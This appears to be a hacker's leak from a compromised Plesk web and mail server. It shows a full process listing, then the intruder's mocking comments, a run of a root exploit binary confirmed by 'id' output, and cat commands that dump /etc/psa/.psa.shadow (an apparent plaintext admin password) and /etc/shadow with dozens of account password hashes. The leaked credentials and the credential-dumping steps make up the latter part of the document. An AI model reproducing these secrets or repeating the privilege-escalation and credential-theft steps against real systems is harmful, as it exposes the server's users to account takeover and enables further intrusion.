- root 215 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/1]
- root 216 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/2]
- root 217 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/3]
- root 372 0.0 0.0 0 0 ? S< Feb22 0:00 [kpsmoused]
- root 417 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/0]
- root 418 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/1]
- root 419 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/2]
- root 420 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/3]
- root 421 0.0 0.0 0 0 ? S< Feb22 0:00 [ata_aux]
- root 427 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_0]
- root 428 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_1]
- root 444 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_2]
- root 445 0.0 0.0 0 0 ? S Feb22 0:00 [hpt_wt]
- root 446 0.0 0.0 0 0 ? S< Feb22 151:44 [kjournald]
- root 471 0.0 0.0 0 0 ? S< Feb22 1:12 [kauditd]
- root 504 0.0 0.0 2376 652 ? S< Feb22 0:00 [kmpathd/0]
- root 1304 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/1]
- root 1305 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/2]
- root 1306 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/3]
- root 1345 0.0 0.0 5072 1608 ? S Jul16 0:01
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 1346 0.0 0.0 7296 1144 ? S Jul16 0:03 /usr/bin/imapd
- Maildir
- root 1355 0.0 0.0 0 0 ? S< Feb22 0:00 [kjournald]
- root 1387 0.0 0.0 5072 1848 ? S Jul16 0:01
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 1388 0.0 0.0 7372 1528 ? S Jul16 0:54 /usr/bin/imapd
- Maildir
- root 1401 0.0 0.0 5072 1608 ? S Jul16 0:01
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 1402 0.0 0.0 7296 1508 ? S Jul16 0:02 /usr/bin/imapd
- Maildir
- root 2218 0.0 0.0 13668 904 ? S< Feb22 0:00 [krfcommd]
- root 2489 0.0 0.0 12948 1344 ? Ssl Feb22 2:16 pcscd
- root 2503 0.0 0.0 1756 520 ? Ss Feb22 0:00 /usr/sbin/acpid
- root 2527 0.0 0.0 2004 448 ? Ss Feb22 0:00 /usr/bin/hidd
- --server
- root 2552 0.0 0.0 30436 1320 ? Ssl Feb22 1:12 automount
- root 2597 0.0 0.0 7212 872 ? Ss Feb22 2:01 /usr/sbin/sshd
- root 2610 0.0 0.1 10256 2072 ? Ss Feb22 0:00 cupsd
- root 2747 0.0 0.0 2000 464 ? Ss Feb22 0:00 gpm -m
- /dev/input/mice -t exps2
- postgres 2982 0.0 0.0 21240 1688 ? S Feb22 0:00
- /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
- postgres 2984 0.0 0.0 11016 420 ? S Feb22 0:06 postgres:
- logger process
- postgres 3001 0.0 0.0 21240 512 ? S Feb22 0:04 postgres:
- writer process
- postgres 3002 0.0 0.0 12020 292 ? S Feb22 0:00 postgres: stats
- buffer process
- postgres 3003 0.0 0.0 11204 336 ? S Feb22 0:00 postgres: stats
- collector process
- root 3046 0.0 7.0 248660 144752 ? Ss Feb22 108:36 /usr/sbin/httpd
- xfs 3336 0.0 0.0 3584 1188 ? Ss Feb22 0:00 xfs -droppriv
- -daemon
- root 3363 0.0 0.0 2360 444 ? Ss Feb22 0:00 /usr/sbin/atd
- avahi 3398 0.0 0.0 2684 1316 ? Ss Feb22 0:03 avahi-daemon:
- running [ip-97-74-115-143.local]
- avahi 3404 0.0 0.0 2684 424 ? Ss Feb22 0:00 avahi-daemon:
- chroot helper
- 68 3435 0.0 0.1 5776 3856 ? Ss Feb22 0:04 hald
- root 3436 0.0 0.0 3256 1088 ? S Feb22 0:00 hald-runner
- 68 3447 0.0 0.0 2104 828 ? S Feb22 0:00
- hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
- root 3475 0.0 0.0 33784 884 ? Sl Feb22 0:15 /usr/bin/hptsvr
- root 3481 0.0 0.5 28360 11900 ? SN Feb22 0:08 /usr/bin/python
- -tt /usr/sbin/yum-updatesd
- root 3527 0.0 0.0 2656 1216 ? SN Feb22 0:26
- /usr/libexec/gam_server
- root 3855 0.0 0.0 3604 428 ? S Feb22 0:00
- /usr/sbin/smartd -q never
- root 3858 0.0 0.0 1744 464 tty1 Ss+ Feb22 0:00 /sbin/mingetty
- tty1
- root 3859 0.0 0.0 1748 468 tty2 Ss+ Feb22 0:00 /sbin/mingetty
- tty2
- root 3860 0.0 0.0 1744 464 tty3 Ss+ Feb22 0:00 /sbin/mingetty
- tty3
- root 3862 0.0 0.0 1744 460 tty4 Ss+ Feb22 0:00 /sbin/mingetty
- tty4
- root 3865 0.0 0.0 1744 464 tty5 Ss+ Feb22 0:00 /sbin/mingetty
- tty5
- root 3867 0.0 0.0 1748 468 tty6 Ss+ Feb22 0:00 /sbin/mingetty
- tty6
- root 3869 0.0 0.4 23908 8900 ? Ss Feb22 1:43
- /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini
- /usr/local/psa/admin/bin/modules/watchdog/wdcollect -c
- /usr/local/psa/etc/modules/watchdog/wdcollect.inc.php
- root 3870 0.0 0.1 37624 2848 ? Ssl Feb22 47:27
- /usr/local/psa/admin/bin/modules/watchdog/monit -Ic
- /usr/local/psa/etc/modules/watchdog/monitrc
- root 5213 0.0 0.1 12360 3512 ? Ss Jul22 0:13 sshd:
- root@notty
- root 5217 0.0 0.0 6856 1748 ? Ss Jul22 0:00
- /usr/libexec/openssh/sftp-server
- root 5971 0.0 0.0 5068 1616 ? S Jul24 0:00
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 5974 0.0 0.0 7300 1248 ? S Jul24 0:00 /usr/bin/imapd
- Maildir
- root 6969 0.0 0.1 12132 3216 ? Ss Jul21 0:15 sshd:
- root@notty
- root 6978 0.0 0.0 6780 1604 ? Ss Jul21 0:00
- /usr/libexec/openssh/sftp-server
- root 6982 0.0 1.4 32744 30092 ? Ss Jul18 0:17 /usr/bin/spamd
- --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail
- --max-children 5 --create-prefs
- --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin
- --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock
- root 7630 0.0 0.0 5380 1000 ? Ss Feb24 1:00 crond
- root 7986 0.0 0.0 0 0 ? S Jul23 0:12 [pdflush]
- 30 8301 0.0 0.0 3208 564 ? Ss Mar16 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
- 30 8302 0.0 0.0 3208 564 ? Ss Mar16 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
- apache 8354 0.1 6.8 249524 140568 ? S 03:04 0:02 /usr/sbin/httpd
- drweb 9073 0.0 6.8 145876 140908 ? S 03:06 0:00 drwebd.real
- drweb 9074 0.0 6.8 145876 140932 ? S 03:06 0:00 drwebd.real
- drweb 9075 0.0 6.8 145876 141492 ? S 03:06 0:00 drwebd.real
- drweb 9076 0.0 6.8 145876 141088 ? S 03:06 0:00 drwebd.real
- popuser 9288 0.1 1.7 39044 36312 ? S 00:04 0:17 spamd child
- 501 9741 0.0 0.2 9744 6176 ? S Jul20 0:27
- /usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config
- root 10034 0.0 0.0 5072 1616 ? S Jul24 0:00
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 10043 0.0 0.0 7296 1292 ? S Jul24 0:00 /usr/bin/imapd
- Maildir
- apache 10113 0.1 6.8 249356 140544 ? S 03:14 0:02 /usr/sbin/httpd
- popuser 10206 0.1 1.7 39588 36860 ? S Jul24 0:49 spamd child
- root 11201 0.0 0.0 4904 944 pts/2 S+ Jul20 0:00 screen
- root 11202 0.0 0.0 5584 1668 ? Ss Jul20 0:03 SCREEN
- root 11203 0.0 0.0 4764 1500 pts/1 Ss+ Jul20 0:00 /bin/bash
- root 11229 0.0 0.0 4760 1524 pts/3 Ss+ Jul20 0:00 /bin/bash
- root 11698 0.0 0.0 5072 1612 ? S Jul12 0:01
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 11701 0.0 0.0 7296 1500 ? S Jul12 0:42 /usr/bin/imapd
- Maildir
- root 11877 0.0 0.0 5072 1612 ? S Jul12 0:01
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 11878 0.0 0.0 7296 1172 ? S Jul12 0:13 /usr/bin/imapd
- Maildir
- root 12664 0.0 0.0 2832 780 ? Ss May17 1:33 xinetd
- -stayalive -pidfile /var/run/xinetd.pid
- drweb 12921 0.4 6.8 145876 142236 ? Ss May05 523:34 drwebd.real
- apache 14656 0.1 6.8 249468 140792 ? S 03:21 0:02 /usr/sbin/httpd
- apache 14807 0.0 6.8 249324 140492 ? S 03:22 0:01 /usr/sbin/httpd
- apache 14927 0.1 7.2 258392 149936 ? S 03:22 0:01 /usr/sbin/httpd
- apache 15025 0.1 6.8 249560 141268 ? S 03:23 0:02 /usr/sbin/httpd
- popuser 15706 0.0 0.0 7404 1528 ? S 03:25 0:00 /usr/bin/imapd
- Maildir
- 30 15854 0.0 0.0 3208 660 ? Ss Mar22 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
- 30 15856 0.0 0.0 3200 824 ? Ss Mar22 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
- apache 16054 0.0 6.8 251588 140624 ? S 03:29 0:00 /usr/sbin/httpd
- apache 16681 0.0 6.7 249208 140300 ? S 03:30 0:00 /usr/sbin/httpd
- root 17623 0.0 0.0 5072 1616 ? S 00:29 0:00
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 17629 0.0 0.0 7296 1412 ? S 00:29 0:00 /usr/bin/imapd
- Maildir
- root 17716 0.0 0.0 0 0 ? S Jul24 0:14 [pdflush]
- popuser 18091 0.0 0.0 7292 1136 ? S 01:38 0:00 /usr/bin/imapd
- Maildir
- root 18097 0.0 0.0 5068 1596 ? S 01:38 0:00 couriertls
- -localfd=4 -tcpd -server
- apache 18708 0.1 6.7 249328 139912 ? S 03:38 0:00 /usr/sbin/httpd
- 30 19002 0.0 0.0 3200 564 ? Ss May05 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
- root 19106 0.0 0.0 6072 732 ? S Jul08 0:09
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40
- -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143
- /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- root 19110 0.0 0.0 4904 1116 ? S Jul08 0:06
- /usr/sbin/courierlogger imapd
- root 19118 0.0 0.0 6068 732 ? S Jul08 0:14
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40
- -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- root 19120 0.0 0.0 4904 808 ? S Jul08 0:11
- /usr/sbin/courierlogger imapd-ssl
- root 19126 0.0 0.0 6072 748 ? S Jul08 0:32
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40
- -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110
- /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
- root 19128 0.0 0.0 4900 1112 ? S Jul08 0:23
- /usr/sbin/courierlogger pop3d
- root 19135 0.0 0.0 6068 728 ? S Jul08 0:30
- /usr/lib/courier-imap/couriertcpd -address=0
- -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40
- -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995
- /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
- root 19137 0.0 0.0 4904 996 ? S Jul08 0:23
- /usr/sbin/courierlogger pop3d-ssl
- apache 20073 0.0 6.7 248988 138776 ? S 03:43 0:00 /usr/sbin/httpd
- root 20144 0.0 0.0 5068 1612 ? S 03:44 0:00
- /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
- popuser 20145 0.0 0.0 4936 860 ? S 03:44 0:00 /usr/bin/pop3d
- Maildir
- apache 20319 0.0 6.4 236508 132820 ? S Jul24 0:00 /usr/sbin/httpd
- postfix 20848 0.0 0.1 8816 3452 ? S 03:46 0:00 smtpd -n smtp
- -t inet -u -c -o smtpd_proxy_filter 127.0.0.1:10025
- postfix 20849 0.0 0.0 7012 1732 ? S 03:46 0:00 proxymap -t
- unix -u
- postfix 20850 0.0 0.0 7024 1732 ? S 03:46 0:00 anvil -l -t
- unix -u
- postfix 20851 0.0 0.1 7172 2156 ? S 03:46 0:00 trivial-rewrite
- -n rewrite -t unix -u
- postfix 20852 0.0 0.0 7020 1720 ? S 03:46 0:00 spawn -n
- 127.0.0.1:10025 -t inet user=mhandlers-user
- argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
- postfix 20854 0.0 0.0 7024 1728 ? S 03:46 0:00 spawn -n
- 127.0.0.1:10027 -t inet user=mhandlers-user
- argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
- postfix 20856 0.0 0.1 8848 3292 ? S 03:46 0:00 smtpd -n
- 127.0.0.1:10026 -t inet -u -c -o smtpd_client_restrictions -o
- smtpd_helo_restrictions -o smtpd_sender_restrictions -o
- smtpd_recipient_restrictions permit_mynetworks,reject -o smtpd_data_restrictions
- -o receive_override_options no_unknown_recipient_checks
- postfix 20857 0.0 0.1 7156 2272 ? S 03:46 0:00 cleanup -z -t
- unix -u
- postfix 20858 0.0 0.0 7068 1824 ? S 03:46 0:00 pipe -n
- plesk_virtual -t unix flags=DORhu user=popuser popuser
- argv=/usr/lib/plesk-9.0/postfix-local -f ${sender} -d ${recipient} -p
- /var/qmail/mailnames
- apache 20889 0.0 0.0 2272 824 ? R 03:47 0:00 ps -aux
- root 21272 0.0 0.1 12936 4096 ? Ss Jul21 0:16 sshd:
- root@notty
- root 21278 0.0 0.0 6796 1748 ? Ss Jul21 0:00
- /usr/libexec/openssh/sftp-server
- root 21568 0.0 0.0 6968 1788 ? Ss Jul08 5:03
- /usr/libexec/postfix/master
- postfix 21765 0.0 0.1 8244 3064 ? S Jul08 3:16 qmgr -l -t fifo
- -u
- postfix 21910 0.0 0.0 7068 1932 ? S Jul08 0:09 tlsmgr -l -t
- unix -u
- apache 22145 0.1 7.0 256496 146220 ? S 01:56 0:08 /usr/sbin/httpd
- 30 23051 0.0 0.0 3200 652 ? Ss Mar18 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
- 30 23052 0.0 0.0 3200 708 ? Ss Mar18 0:00
- /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
- root 23196 0.0 0.0 4764 1500 pts/0 Ss+ Jul20 0:00 /bin/bash
- named 24811 0.0 0.2 72156 5504 ? Ssl Jun29 11:38 /usr/sbin/named
- -u named -c /etc/named.conf -u named -t /var/named/run-root
- apache 25023 0.1 6.8 249408 140780 ? S 02:10 0:06 /usr/sbin/httpd
- apache 25276 0.1 6.8 251928 141112 ? S 02:10 0:09 /usr/sbin/httpd
- apache 26378 0.1 6.8 249368 140756 ? S 02:13 0:05 /usr/sbin/httpd
- postfix 30087 0.0 0.0 7032 1780 ? S 02:20 0:00 pickup -l -t
- fifo -u -c -o content_filter smtp:127.0.0.1:10027
- root 30254 0.0 0.1 12140 3216 ? Ss Jul18 0:30 sshd:
- root@pts/2
- root 30395 0.0 0.0 4764 1512 pts/2 Ss Jul18 0:00 -bash
- apache 30715 0.0 6.8 249436 140620 ? S 02:21 0:04 /usr/sbin/httpd
- root 31126 0.0 0.0 4624 1216 pts/1 S Jul20 0:00 /bin/sh
- /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock
- --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
- --user=mysql
- mysql 31206 24.4 2.2 166880 45728 pts/1 Sl Jul20 1587:18
- /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
- --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking
- --socket=/var/lib/mysql/mysql.sock
- root 31988 0.0 0.0 5072 1604 ? S Jul16 0:01
- /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
- /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
- popuser 31992 0.0 0.0 7292 1420 ? S Jul16 0:03 /usr/bin/imapd
- Maildir
- // TIME TO GET STREET ON THESE PIGS
- $ ./a.black.hat.never.kisses.and.tells
- # id
- uid=0(root) gid=0(root) groups=48(apache),2521(psaserv)
- // CRACKING SHADOW FILES ARE LESS FUN WHEN PLESK STORES USER, FTP AND EMAIL
- // PASSES IN PLAINTEXT IN FILES AND MYSQL PSA TABLES
- # cat /etc/psa/.psa.shadow
- 8w667nHzx%XFXb
- # cat /etc/shadow
- root:$1$9f.5eJ9.$QUYSU4l8mMYIIhg7Dvk5n0:15135:0:99999:7:::
- bin:*:13913:0:99999:7:::
- daemon:*:13913:0:99999:7:::
- adm:*:13913:0:99999:7:::
- lp:*:13913:0:99999:7:::
- sync:*:13913:0:99999:7:::
- shutdown:*:13913:0:99999:7:::
- halt:*:13913:0:99999:7:::
- mail:*:13913:0:99999:7:::
- news:*:13913:0:99999:7:::
- uucp:*:13913:0:99999:7:::
- operator:*:13913:0:99999:7:::
- games:*:13913:0:99999:7:::
- gopher:*:13913:0:99999:7:::
- ftp:*:13913:0:99999:7:::
- nobody:*:13913:0:99999:7:::
- rpm:!!:13913:0:99999:7:::
- dbus:!!:13913:0:99999:7:::
- mailnull:!!:13913:0:99999:7:::
- smmsp:!!:13913:0:99999:7:::
- nscd:!!:13913:0:99999:7:::
- vcsa:!!:13913:0:99999:7:::
- rpc:!!:13913:0:99999:7:::
- rpcuser:!!:13913:0:99999:7:::
- nfsnobody:!!:13913:0:99999:7:::
- sshd:!!:13913:0:99999:7:::
- pcap:!!:13913:0:99999:7:::
- haldaemon:!!:13913:0:99999:7:::
- webdept:$1$fMH2nTXH$8mR4nakYDl79MWehtHJpJ/:14599:0:99999:7:::
- avahi:!!:14599::::::
- avahi-autoipd:!!:14599::::::
- named:!!:14599::::::
- xfs:!!:14599::::::
- apache:!!:14599::::::
- distcache:!!:14599::::::
- mysql:!!:14599::::::
- ntp:!!:14599::::::
- sw-cp-server:!!:14599:0:99999:7:::
- psaadm:!!:14599:0:99999:7:::
- popuser:!!:14599:0:99999:7:::
- mhandlers-user:!!:14599:0:99999:7:::
- webalizer:!!:14599::::::
- psaftp:!!:14599:0:99999:7:::
- alias:!!:14599:0:99999:7:::
- qmaild:!!:14599:0:99999:7:::
- qmaill:!!:14599:0:99999:7:::
- qmailp:!!:14599:0:99999:7:::
- qmailq:!!:14599:0:99999:7:::
- qmailr:!!:14599:0:99999:7:::
- qmails:!!:14599:0:99999:7:::
- postgres:!!:14599::::::
- drweb:!!:14599::::::
- jdpa:!$1$JyO0yJgZ$HssFeCuxD2qNPBcqVAcrE0:14600:0:99999:7:::
- barms:$1$JMHnROPk$hW1voLIUUozaP3fB/Q3PS/:14600:0:99999:7:::
- bcsd:$1$9N.SKA8k$UB9Fa1pj4O9ScqvanwsuD0:14600:0:99999:7:::
- bjm:$1$nQFDQuzG$nixGXRSZ2weKVIZbWvY2Y1:14600:0:99999:7:::
- demo:$1$A/PXg4Bp$gxE6Tua9ymjgqIZiruTZJ/:14600:0:99999:7:::
- dymin:$1$aV.nPRpD$w0u6q9utdB9fC0ze0Y9jk1:14600:0:99999:7:::
- dcsd:$1$BmkM/hGw$WYVxaTBKlAnAG9oZfTNs40:14600:0:99999:7:::
- bocg:$1$YCTsX/LA$muqhDQl9XfKRS691T9Ebu0:14600:0:99999:7:::
- crcsd:$1$R2N6hV/D$Efk6P7K2EF6waHHkC.z9/.:14600:0:99999:7:::
- bocs:$1$WTdEJKgC$cTG5MeoEUpdCmEODakZbF.:14600:0:99999:7:::
- izhth:$1$kUKcvc.x$D20GJqyHyrmwvt9SUHSuo0:14600:0:99999:7:::
- mcmtn:$1$neyLtM6z$VuI6CW0/bf5hdOUqgGkSn0:14600:0:99999:7:::
- ccsal:$1$vhubLzwF$Evrqm.AX4vusW3SqmZA3B0:14600:0:99999:7:::
- tunms:$1$annTeiUZ$twvp7SQzRRNJNEIvxS3Cx/:14600:0:99999:7:::
- ccsd:$1$Lzz71cOH$Djo2V4u/SL9JKqrkvK0/41:14600:0:99999:7:::
- ciwy:$1$DrcaNoRu$pj27lg4ogzIM/1T3xXCpF/:14600:0:99999:7:::
- ncsd:$1$KRjV7G3q$sdkmFwpIp7p9FF1f4hhn90:14600:0:99999:7:::
- icsd:$1$Jg/IPNZ3$173b6vFq9AlwznflpUbzp/:14600:0:99999:7:::
- shsd:$1$4JEzAXVt$KG42rhcwE0livRJ00Awgb/:14600:0:99999:7:::
- polms:$1$QEqTUIBr$L1VWAWaGnhYGsRu0FDrr6/:14600:0:99999:7:::
- grcg:$1$yoyTc6DI$X8v6sg7ExdoUg0bNi8kmU/:14600:0:99999:7:::
- lawmo:$1$0uQIYYqK$y0TIsAA9Miv4Vfn5o7KhR.:14600:0:99999:7:::
- johms:$1$ljRMripB$/v33v9izoRJKITBK04ZgV.:14600:0:99999:7:::
- sacsd:$1$6vTTH5h.$mu0.aSPxOJnNfw0Y1Yhy81:14600:0:99999:7:::
- jcsd:$1$SR7NPa.y$bXGwoje29eCLh/jeptX7m.:14600:0:99999:7:::
- gcsd:$1$ai7yamMR$JZPQccHWCGmMDeQFJ56eg0:14600:0:99999:7:::
- izcg:$1$PpoAe8un$Tmmp4XEdNWUlJPSJv80Xj0:14600:0:99999:7:::
- jocsd:$1$NRHv77bV$LA2Xex9kNa46frC/0ArlW1:14600:0:99999:7:::
- scsd:$1$xKBlDTZE$.mpjBbZ0yHHsNcFCmu7pT0:14600:0:99999:7:::
- bjm2:$1$IyEce8if$BFsLo9r.7HgTftQhJHGPh/:14600:0:99999:7:::
- test:$1$/SMm0ODb$EX2C/eZ7Lo3BPfzIlZfBF0:14601:0:99999:7:::
- bcsd_sync:$1$6WexrYqZ$3ROvk9LXiGIAjx/yMFgGc.:14601:0:99999:7:::
- ccsal_synce:!!:14601:0:99999:7:::
- ccsal_sync:$1$1R4G9HKN$0nsQSMPnDwPI8QwcOoB4x0:14601:0:99999:7:::
- kluser:!!:14602:0:99999:7:::
- tigeraccessftp:$1$vIx5yzLJ$QLvytS5blodUB69dx4Ff81:14607:0:99999:7:::
- vbcsd:$1$Xa7IjTjy$EVOg0CDGrhKecE9tcEv0K1:14614:0:99999:7:::
- jonms2:$1$UEKyybmq$V.KCuSAArIbZ97Rb3j.Gj.:14624:0:99999:7:::
- ccsoks:$1$5Um4tVSe$nmmR1DwLGB1rVtilMJUnW.:14629:0:99999:7:::
- crcg:$1$5W78GNCt$5AsiPm0MkUOaxLy7PZUbC.:14637:0:99999:7:::
- tcsoms:$1$AUtRv.T/$8PAgYTEZNTkHAg29MuxxA.:14644:0:99999:7:::
- hcsoks:$1$QNKj.3g8$a5XwX/ucCpz25QC.a7Yyr1:14650:0:99999:7:::
- jcsoks:$1$rLe4qHgu$YVf.K6kRj5bzWE/bYYG2x/:14656:0:99999:7:::
- mosa:$1$dIsYss8M$8wcFZe8f9xyrQg/M5fw2q.:14662:0:99999:7:::
- pcsoks:$1$aOO/b7/y$fksYEq1P0ydvkBDACy7PN1:14678:0:99999:7:::
- johms_sync:$1$JJOQW/Ub$KQcLsIuntNhvuT.IgHfr51:15140:0:99999:7:::
- hcsar:$1$HRrStn03$JID8.6JAq3uO9Ea89sGWy/:14691:0:99999:7:::
- hscar:$1$eT4u9sV5$1yfafNGVFeJLzHKIDnTPB.:14691:0:99999:7:::
- pcsoia:$1$iA.cOgM7$bKcN9Md8bgaqgDOeWMLTk1:14692:0:99999:7:::
- mcsd:$1$w8xq8Wiz$9h9Vmun9mouExbFw5TP9./:14701:0:99999:7:::
- wsoks:$1$RA/aiiIn$vWff63MvT9OM6m/I9g/wI1:14718:0:99999:7:::
- mosa2010bN:!!:14719:0:99999:7:::
- mosa2010:$1$rkKGNbTJ$zuSXZpGmBGZmBLblIR..M0:14720:0:99999:7:::
- faoret:$1$6FeVAWdI$5tdP6hddCUejnapF8SpSr.:14725:0:99999:7:::
- bcso_tiger:$1$LY1S8HSQ$nmrLU.ZovFp/3SyDPqh/G.:14727:0:99999:7:::
- stcsd:$1$pDRSTxFh$ZBvOBAFQ7LnFMjUdsa16g.:14728:0:99999:7:::
- ccsoms:$1$2AcdfJU9$S7c4H4a0ySzzHVv1Xp8vT0:14736:0:99999:7:::
- kcsoms:$1$9/UGCy/Q$v0YU2N4s6fJA1WRrnO4/y1:14743:0:99999:7:::
- pcsoks_sync:$1$ZVgfXBYP$8/7JU659Rzy6AFMTsgUDk1:14753:0:99999:7:::
- mocsd:$1$ruYfFxnn$THY1iwfnln5fIWJEZ.xuI1:14754:0:99999:7:::
- postfix:!!:14768::::::
- bcsoga:$1$um3cyDMU$iyb6m61oqCGNxsBoFTLP2/:14770:0:99999:7:::
- jonms_sync:$1$ox9q2AUv$Z.PKJVfV6wBqkdE27vbNw/:14771:0:99999:7:::
- jcsoks_sync:$1$XkeeIlA/$6H68JaLVbeKNw7YGOOkX31:14790:0:99999:7:::
- cpsola:$1$NwWGtomq$jgAUVRm6VBvGSujRtKwF31:14806:0:99999:7:::
- cgsomo:$1$eilIGZWl$eLznlmIdX3xApkdWmpsnT.:14810:0:99999:7:::
- sfsoar:$1$yOE1lcCf$GUu9M1fczt1Ghc764zw/30:14824:0:99999:7:::
- sfsoar_sync:$1$nxHb55iY$vFvZhr1ruVHu/4U981Jk2.:14826:0:99999:7:::
- code:$1$iqeHXuMI$4vRAcEszoYdstIN3RMgx60:14837:0:99999:7:::
- fcsoga:$1$T2d2gmYb$FFMQvYx7VRTFEtMtYzENj1:14841:0:99999:7:::
- mcsoga:$1$sU6wEv93$dY7TnQIfrf7CNtxrb1BHv0:14852:0:99999:7:::
- code2:$1$j9vWcrHj$ackLsXxNqZYDlHGs9EfTJ/:14853:0:99999:7:::
- kcsoil:$1$RktuLOY5$rqG9aojQ7QPev715Sziym0:14855:0:99999:7:::
- mcsoal:$1$DfHeInc2$tl5Z3EJ5cbpEI7PAi..nR.:14874:0:99999:7:::
- sgsomo:$1$ofmWWjSo$VdSaYP7i5Mq3TaigZKJmY/:14879:0:99999:7:::
- gcsoms:$1$GwuFixxs$ar2pJ.ZaG9F/zahcjl0JP0:14879:0:99999:7:::
- stoms:$1$VRmMMzI7$x1nr.ZMBdSv7VOng/TpX//:14897:0:99999:7:::
- hcsar_sync:$1$k8HSpdqc$5G8/PJOdzeQN8W2VKJj461:14901:0:99999:7:::
- alsa:$1$0D1HLRSq$6mKb1LEmHoM/q2HhpXSjq/:14902:0:99999:7:::
- pcsoar:$1$HxfuMiMY$bAapp8diWD1nSOjkTEqNx/:14917:0:99999:7:::
- rcsd:$1$9poK4hQN$gzorj3zcz7dpG21M45ai5.:14921:0:99999:7:::
- tisoms:$1$wXhmWMjs$EARUykep59RVk3KBNLIay/:14924:0:99999:7:::
- stoms_sync:$1$TEYhWb2S$dYeYk0rb/sqikIaqqovuR/:14945:0:99999:7:::
- prsoar:$1$ZIuKGFWZ$b9QSyf2DPsYbBm/pNe.WP1:14952:0:99999:7:::
- mcsd_sync:$1$b1gA3kVg$Rg3yF/yRG.A/YEM4idaXW1:15001:0:99999:7:::
- jccgms:$1$52kEGL60$J3C2CN/1fq4b.nD1EaNHP1:15009:0:99999:7:::
- ccsook:$1$amm2tffa$XaIWUbOY47Dr02lvTWEFf/:15056:0:99999:7:::
- fcsoar:$1$W74MwMzz$QuYSprTouxtkRx/wKgIJL1:15057:0:99999:7:::
- poalac:$1$q.RuXO6m$C/hJSOR8TUzP5iZvmh3vc1:15085:0:99999:7:::
- arsa:$1$dY5DsE1V$aGJWYgu9pj.kO0gQ14zpd0:15097:0:99999:7:::
- rcpica:$1$CXfW/jiM$PrVYk8La/RySYfT0FeMRI/:15100:0:99999:7:::
